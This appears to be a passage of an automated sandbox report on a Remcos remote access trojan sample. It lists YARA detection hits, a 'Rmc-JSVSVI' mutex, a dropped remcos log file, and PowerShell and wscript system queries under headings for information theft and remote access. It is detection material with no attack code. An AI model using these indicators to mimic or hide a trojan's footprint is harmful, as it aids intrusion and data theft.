Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: amsi32_8344.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_8840.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2184.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5520.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2484.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_4756.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_9020.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7908.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5436.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR

Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.2882266022.000000000C028000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2040616405.000000000ADA8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2550254218.000000000A8F8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1806892725.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1546112824.00000000077A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2303557593.0000000006DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1549446860.0000000008710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2858524631.0000000008418000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1719709803.00000000072B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2839073220.0000000007DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1780758184.000000000ADE8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2433999584.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2365827222.0000000007CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2080417610.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1944611268.000000000723A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Remote Access Functionality

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JSVSVI

Source: Yara match	File source: amsi32_8344.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_8840.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2184.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5520.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2484.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_4756.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_9020.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7908.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5436.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR

Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.powershell.exe.8da1288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.2882266022.000000000C028000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2040616405.000000000ADA8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2550254218.000000000A8F8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1806892725.0000000002DDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1546112824.00000000077A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2303557593.0000000006DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1549446860.0000000008710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2858524631.0000000008418000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1719709803.00000000072B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2839073220.0000000007DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1551424407.0000000008DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1552180050.0000000008E79000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1780758184.000000000ADE8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2433999584.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2365827222.0000000007CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2080417610.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1944611268.000000000723A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED